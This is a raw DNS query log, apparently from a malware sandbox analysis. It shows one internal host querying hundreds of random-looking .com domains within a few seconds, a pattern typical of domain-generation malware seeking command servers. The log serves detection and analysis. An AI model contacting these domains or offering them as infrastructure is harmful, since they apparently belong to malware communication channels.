                                                                                                                                                                                                            Nov 11, 2024 18:07:47.742149115 CET192.168.2.91.1.1.10x5751Standard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.742533922 CET192.168.2.91.1.1.10xec3fStandard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.742682934 CET192.168.2.91.1.1.10x5516Standard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.749800920 CET192.168.2.91.1.1.10x6dd7Standard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.752110004 CET192.168.2.91.1.1.10x9a17Standard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.754708052 CET192.168.2.91.1.1.10x9960Standard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.755717993 CET192.168.2.91.1.1.10x99acStandard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.755928993 CET192.168.2.91.1.1.10x4852Standard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.756661892 CET192.168.2.91.1.1.10x1c6bStandard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.756948948 CET192.168.2.91.1.1.10xf6cdStandard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.757148027 CET192.168.2.91.1.1.10x56e0Standard query (0)qegyval.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.757638931 CET192.168.2.91.1.1.10xf89fStandard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.758116961 CET192.168.2.91.1.1.10xa26bStandard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.758770943 CET192.168.2.91.1.1.10xb1e2Standard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.759073019 CET192.168.2.91.1.1.10x7303Standard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.760345936 CET192.168.2.91.1.1.10x86e5Standard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.761281967 CET192.168.2.91.1.1.10xd25bStandard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.761742115 CET192.168.2.91.1.1.10xf025Standard query (0)galynuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.762276888 CET192.168.2.91.1.1.10x2148Standard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.762726068 CET192.168.2.91.1.1.10x9ea6Standard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.762958050 CET192.168.2.91.1.1.10x1500Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.763293982 CET192.168.2.91.1.1.10x684eStandard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.763472080 CET192.168.2.91.1.1.10x1b30Standard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.764233112 CET192.168.2.91.1.1.10x7894Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.765475988 CET192.168.2.91.1.1.10x3f97Standard query (0)lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.793798923 CET192.168.2.91.1.1.10x9f86Standard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.798697948 CET192.168.2.91.1.1.10x7945Standard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.800889969 CET192.168.2.91.1.1.10x1575Standard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.805293083 CET192.168.2.91.1.1.10x2e3bStandard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.806755066 CET192.168.2.91.1.1.10xebb0Standard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.813694954 CET192.168.2.91.1.1.10xb546Standard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.814013958 CET192.168.2.91.1.1.10xb309Standard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.814358950 CET192.168.2.91.1.1.10xe9dfStandard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.814594984 CET192.168.2.91.1.1.10xa7dbStandard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.814817905 CET192.168.2.91.1.1.10xf4deStandard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.819309950 CET192.168.2.91.1.1.10xb5c1Standard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.819498062 CET192.168.2.91.1.1.10xd8d9Standard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.819928885 CET192.168.2.91.1.1.10x2b18Standard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.820631981 CET192.168.2.91.1.1.10x29d4Standard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.821968079 CET192.168.2.91.1.1.10x95b0Standard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.822465897 CET192.168.2.91.1.1.10xc465Standard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.822798967 CET192.168.2.91.1.1.10xaabStandard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.838185072 CET192.168.2.91.1.1.10xf366Standard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.838337898 CET192.168.2.91.1.1.10x9808Standard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.838566065 CET192.168.2.91.1.1.10xb59aStandard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.842166901 CET192.168.2.91.1.1.10xd73fStandard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.843343973 CET192.168.2.91.1.1.10x7348Standard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.843611002 CET192.168.2.91.1.1.10xa0a4Standard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.843849897 CET192.168.2.91.1.1.10x1e42Standard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.844157934 CET192.168.2.91.1.1.10x24a6Standard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.844299078 CET192.168.2.91.1.1.10xb569Standard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.845380068 CET192.168.2.91.1.1.10xe157Standard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.881503105 CET192.168.2.91.1.1.10x65c6Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.899296045 CET192.168.2.91.1.1.10xc73bStandard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.899657965 CET192.168.2.91.1.1.10x6164Standard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.900702000 CET192.168.2.91.1.1.10x5e0fStandard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.900995016 CET192.168.2.91.1.1.10x245cStandard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.901168108 CET192.168.2.91.1.1.10x8116Standard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.901325941 CET192.168.2.91.1.1.10xfbb7Standard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.909743071 CET192.168.2.91.1.1.10x530fStandard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.909800053 CET192.168.2.91.1.1.10xddadStandard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.909985065 CET192.168.2.91.1.1.10xc03eStandard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:47.913198948 CET192.168.2.91.1.1.10x4730Standard query (0)gadyciz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.104228020 CET192.168.2.91.1.1.10x5a4bStandard query (0)ww25.lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.106344938 CET192.168.2.91.1.1.10x966bStandard query (0)ww16.vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.235205889 CET192.168.2.91.1.1.10xb1caStandard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.236299038 CET192.168.2.91.1.1.10x90adStandard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.237134933 CET192.168.2.91.1.1.10xfbc0Standard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.240983009 CET192.168.2.91.1.1.10xb37dStandard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.243776083 CET192.168.2.91.1.1.10x90f1Standard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.252172947 CET192.168.2.91.1.1.10xcba9Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.269702911 CET192.168.2.91.1.1.10xbbeeStandard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.270878077 CET192.168.2.91.1.1.10x6670Standard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.282437086 CET192.168.2.91.1.1.10xf506Standard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.285479069 CET192.168.2.91.1.1.10x3b8bStandard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.286998987 CET192.168.2.91.1.1.10x527eStandard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.288181067 CET192.168.2.91.1.1.10x168cStandard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.300915003 CET192.168.2.91.1.1.10xf1c4Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.302273035 CET192.168.2.91.1.1.10x2ba7Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.328804970 CET192.168.2.91.1.1.10x92d2Standard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.356602907 CET192.168.2.91.1.1.10xd03aStandard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.364592075 CET192.168.2.91.1.1.10x67ceStandard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.365333080 CET192.168.2.91.1.1.10x5e57Standard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.365896940 CET192.168.2.91.1.1.10x49ecStandard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.367803097 CET192.168.2.91.1.1.10xf622Standard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.375456095 CET192.168.2.91.1.1.10x69ffStandard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.375854015 CET192.168.2.91.1.1.10xe163Standard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.384270906 CET192.168.2.91.1.1.10x9e7cStandard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.386697054 CET192.168.2.91.1.1.10x4b49Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.390408993 CET192.168.2.91.1.1.10xae8bStandard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.390758038 CET192.168.2.91.1.1.10x4d22Standard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.391839027 CET192.168.2.91.1.1.10x2435Standard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.393821001 CET192.168.2.91.1.1.10xc110Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.416172028 CET192.168.2.91.1.1.10x9a5bStandard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.416532040 CET192.168.2.91.1.1.10x903fStandard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.427431107 CET192.168.2.91.1.1.10x4ce8Standard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.427639961 CET192.168.2.91.1.1.10x398dStandard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.427740097 CET192.168.2.91.1.1.10x16d1Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.428373098 CET192.168.2.91.1.1.10x843fStandard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.436482906 CET192.168.2.91.1.1.10xad81Standard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.436815977 CET192.168.2.91.1.1.10x8dStandard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.437031984 CET192.168.2.91.1.1.10x945cStandard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.439888954 CET192.168.2.91.1.1.10xc375Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.440269947 CET192.168.2.91.1.1.10x2a4Standard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.440427065 CET192.168.2.91.1.1.10xd775Standard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.440655947 CET192.168.2.91.1.1.10x2040Standard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.440782070 CET192.168.2.91.1.1.10xe7a8Standard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.442284107 CET192.168.2.91.1.1.10xdab8Standard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.444875002 CET192.168.2.91.1.1.10x8625Standard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.445080042 CET192.168.2.91.1.1.10x2dfaStandard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.445178032 CET192.168.2.91.1.1.10x5558Standard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.445657969 CET192.168.2.91.1.1.10x7002Standard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.459387064 CET192.168.2.91.1.1.10xe34dStandard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.459573030 CET192.168.2.91.1.1.10x6900Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.460412025 CET192.168.2.91.1.1.10x904dStandard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.460480928 CET192.168.2.91.1.1.10x5f11Standard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.460621119 CET192.168.2.91.1.1.10x1d23Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.460758924 CET192.168.2.91.1.1.10x1538Standard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.461019039 CET192.168.2.91.1.1.10x56e0Standard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.462241888 CET192.168.2.91.1.1.10x30fbStandard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.462465048 CET192.168.2.91.1.1.10xf48bStandard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.462811947 CET192.168.2.91.1.1.10x823aStandard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.464601994 CET192.168.2.91.1.1.10x17e6Standard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.464720011 CET192.168.2.91.1.1.10x9b6fStandard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.466466904 CET192.168.2.91.1.1.10xf2aeStandard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.467590094 CET192.168.2.91.1.1.10xbf2cStandard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.467720985 CET192.168.2.91.1.1.10x9f12Standard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.467784882 CET192.168.2.91.1.1.10x33dfStandard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.467948914 CET192.168.2.91.1.1.10x9c55Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.584433079 CET192.168.2.91.1.1.10xf638Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.590735912 CET192.168.2.91.1.1.10xd717Standard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.597263098 CET192.168.2.91.1.1.10xf6Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.597449064 CET192.168.2.91.1.1.10xec5fStandard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.597687006 CET192.168.2.91.1.1.10xcf6aStandard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.602555990 CET192.168.2.91.1.1.10x5aaeStandard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.604652882 CET192.168.2.91.1.1.10x7179Standard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.604652882 CET192.168.2.91.1.1.10x303fStandard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.605470896 CET192.168.2.91.1.1.10xa659Standard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.606380939 CET192.168.2.91.1.1.10x2cfaStandard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.607198000 CET192.168.2.91.1.1.10xed51Standard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.609376907 CET192.168.2.91.1.1.10xd778Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.609764099 CET192.168.2.91.1.1.10xe9c7Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.610735893 CET192.168.2.91.1.1.10x34d6Standard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612013102 CET192.168.2.91.1.1.10x2137Standard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612371922 CET192.168.2.91.1.1.10xf86bStandard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612509966 CET192.168.2.91.1.1.10xf37eStandard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612859964 CET192.168.2.91.1.1.10xb323Standard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.612956047 CET192.168.2.91.1.1.10xb7b8Standard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.613688946 CET192.168.2.91.1.1.10x9078Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.664427996 CET192.168.2.91.1.1.10xec11Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.664993048 CET192.168.2.91.1.1.10x3656Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.667336941 CET192.168.2.91.1.1.10x1703Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.667813063 CET192.168.2.91.1.1.10xa691Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.668025017 CET192.168.2.91.1.1.10x6672Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.668553114 CET192.168.2.91.1.1.10xb58Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.668803930 CET192.168.2.91.1.1.10x9acaStandard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.669148922 CET192.168.2.91.1.1.10x1c32Standard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.669482946 CET192.168.2.91.1.1.10xf028Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.686487913 CET192.168.2.91.1.1.10xda5bStandard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.698743105 CET192.168.2.91.1.1.10xbda1Standard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.703600883 CET192.168.2.91.1.1.10xaa8eStandard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.704046011 CET192.168.2.91.1.1.10x7ad3Standard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.704771996 CET192.168.2.91.1.1.10x93e7Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.704962969 CET192.168.2.91.1.1.10xc868Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.723022938 CET192.168.2.91.1.1.10x2858Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.734762907 CET192.168.2.91.1.1.10x7dc8Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.736766100 CET192.168.2.91.1.1.10x386fStandard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737031937 CET192.168.2.91.1.1.10x6d78Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737163067 CET192.168.2.91.1.1.10xd12Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737251997 CET192.168.2.91.1.1.10xec5bStandard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737354040 CET192.168.2.91.1.1.10x414bStandard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737468958 CET192.168.2.91.1.1.10x3cf9Standard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737673998 CET192.168.2.91.1.1.10xaf3eStandard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.737867117 CET192.168.2.91.1.1.10x3aa6Standard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738080978 CET192.168.2.91.1.1.10x8105Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738286018 CET192.168.2.91.1.1.10xe7b2Standard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738430977 CET192.168.2.91.1.1.10x21e5Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738815069 CET192.168.2.91.1.1.10x5828Standard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.738847971 CET192.168.2.91.1.1.10xc41fStandard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.739042997 CET192.168.2.91.1.1.10x237fStandard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.739053965 CET192.168.2.91.1.1.10x16c6Standard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.739233971 CET192.168.2.91.1.1.10xe19dStandard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.739844084 CET192.168.2.91.1.1.10x3492Standard query (0)puzypug.comA (IP address)IN (0x0001)false
